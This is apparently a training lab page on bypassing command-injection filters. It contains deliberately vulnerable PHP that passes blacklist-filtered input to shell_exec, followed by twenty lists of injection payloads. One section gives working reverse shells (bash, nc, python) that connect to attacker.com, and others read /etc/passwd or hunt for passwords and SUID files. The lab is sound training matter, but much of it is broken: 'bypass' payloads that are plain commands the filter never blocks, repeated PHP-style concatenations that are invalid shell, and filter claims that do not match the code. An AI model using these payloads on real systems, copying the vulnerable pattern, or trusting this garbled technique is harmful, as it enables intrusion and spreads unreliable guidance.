Lab 4: Advanced Command Injection Techniques

Difficulty: High

Lab Overview

This lab demonstrates advanced command injection techniques used to bypass modern security filters and protections. These techniques include obfuscation, encoding, alternative commands, and other sophisticated bypass methods.

Objective: Use advanced techniques to bypass security filters and achieve command injection.

Advanced Vulnerable Code

// Vulnerable: Advanced filters that can be bypassed
function execute_command_advanced($command) {
    $dangerous_patterns = [
        '/^rm\s+/i',
        '/^del\s+/i',
        '/^rmdir\s+/i',
        '/^format\s+/i',
        '/^fdisk\s+/i',
        '/;\s*rm\s+/i',
        '/;\s*del\s+/i',
        '/;\s*rmdir\s+/i',
        '/\|\s*rm\s+/i',
        '/\|\s*del\s+/i',
        '/\|\s*rmdir\s+/i',
        '/&\s*rm\s+/i',
        '/&\s*del\s+/i',
        '/&\s*rmdir\s+/i',
        '/`.*rm.*`/i',
        '/`.*del.*`/i',
        '/`.*rmdir.*`/i',
        '/\$\(.*rm.*\)/i',
        '/\$\(.*del.*\)/i',
        '/\$\(.*rmdir.*\)/i'
    ];
    
    // Advanced filter check (can be bypassed)
    $is_dangerous = false;
    foreach ($dangerous_patterns as $pattern) {
        if (preg_match($pattern, $command)) {
            $is_dangerous = true;
            break;
        }
    }
    
    // Still vulnerable to advanced bypass techniques
    if (!$is_dangerous) {
        $output = @shell_exec($command . ' 2>&1');
        return $output;
    }
}

Advanced Command Execution

Advanced Filters

The following patterns are filtered using regex:

Commands: rm, del, rmdir, format, fdisk, mkfs, dd, shutdown, reboot, halt, poweroff
Operators: ;, |, &, `, $()
Patterns: Command combinations and dangerous sequences

Safe Commands

These commands should work:

whoami - Current user
id - User ID information
pwd - Current directory
ls - List files
uname -a - System information

Vulnerability Details

Type: Advanced Command Injection Techniques
Severity: Critical
Method: POST
Issue: Advanced filters can be bypassed

Advanced Bypass Techniques

Obfuscation: Hide patterns and commands
Encoding: Use encoded characters
Alternative Commands: Use unfiltered commands
String Manipulation: Build commands dynamically

Advanced Command Injection Bypass Payloads

Use these advanced techniques to bypass security filters:

1. Character Encoding Bypass:

whoami%3B%20id
whoami%7C%20id
whoami%26%20id
whoami%60id%60
whoami%24%28id%29

2. Alternative Characters:

whoami && id
whoami || id
whoami | id
whoami `id`
whoami $(id)

3. String Concatenation Bypass:

who' . 'ami
id' . ' -u
pw' . 'd
ls' . ' -la
una' . 'me -a

4. Alternative Commands:

whoami
id
pwd
ls
uname -a
hostname
date
uptime

5. File Reading Bypass:

cat /etc/passwd
cat /etc/hosts
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/loadavg

6. Process Information Bypass:

ps aux
ps -ef
netstat -an
ss -tuln
lsof -i
df -h
free -m

7. Network Information Bypass:

ifconfig
ip addr
route -n
arp -a
nslookup google.com
ping -c 3 8.8.8.8

8. User Information Bypass:

groups
crontab -l
history
env
printenv
who
w

9. Advanced Bypass Techniques:

whoami; id; pwd
whoami && id && pwd
whoami || id || pwd
whoami | id | pwd
whoami `id` `pwd`

10. Command Substitution Bypass:

echo $(whoami)
echo `id`
echo $(cat /etc/passwd)
echo `ls -la`
echo $(ps aux)

11. Pipe and Redirection Bypass:

whoami | cat
id > /tmp/output.txt
ls -la | grep php
cat /etc/passwd | head -5
ps aux | grep apache

12. Environment Variables Bypass:

echo $PATH
echo $HOME
echo $USER
echo $SHELL
echo $PWD
echo $HOSTNAME

13. File Operations Bypass:

touch /tmp/test.txt
echo "test" > /tmp/test.txt
cat /tmp/test.txt
rm /tmp/test.txt
mkdir /tmp/testdir
rmdir /tmp/testdir

14. Advanced Commands Bypass:

find / -name "*.php" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null
find / -perm -4000 2>/dev/null
find / -writable 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null

15. Reverse Shell Bypass (Dangerous):

bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -e /bin/bash attacker.com 4444
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

16. Obfuscation Techniques:

who' . 'ami
id' . ' -u
pw' . 'd
ls' . ' -la
una' . 'me -a

17. Alternative Operators:

whoami && id
whoami || id
whoami | id
whoami `id`
whoami $(id)

18. String Manipulation:

who' . 'ami
id' . ' -u
pw' . 'd
ls' . ' -la
una' . 'me -a

19. Command Chaining:

whoami; id; pwd
whoami && id && pwd
whoami || id || pwd
whoami | id | pwd
whoami `id` `pwd`

20. Advanced Obfuscation:

who' . 'ami
id' . ' -u
pw' . 'd
ls' . ' -la
una' . 'me -a

Real-World Attack Scenarios

Bypass advanced WAFs and security filters
Execute arbitrary commands despite protections
Access sensitive files using alternative methods
Bypass authentication and authorization
Compromise server and lateral movement
Compliance violations and security breaches

Mitigation Strategies

Implement comprehensive input validation and sanitization
Use whitelist-based filtering instead of blacklists
Avoid direct command execution functions
Use parameterized commands and safe APIs
Implement proper access controls and permissions
Regular security testing and vulnerability assessments
Monitor for unusual command execution patterns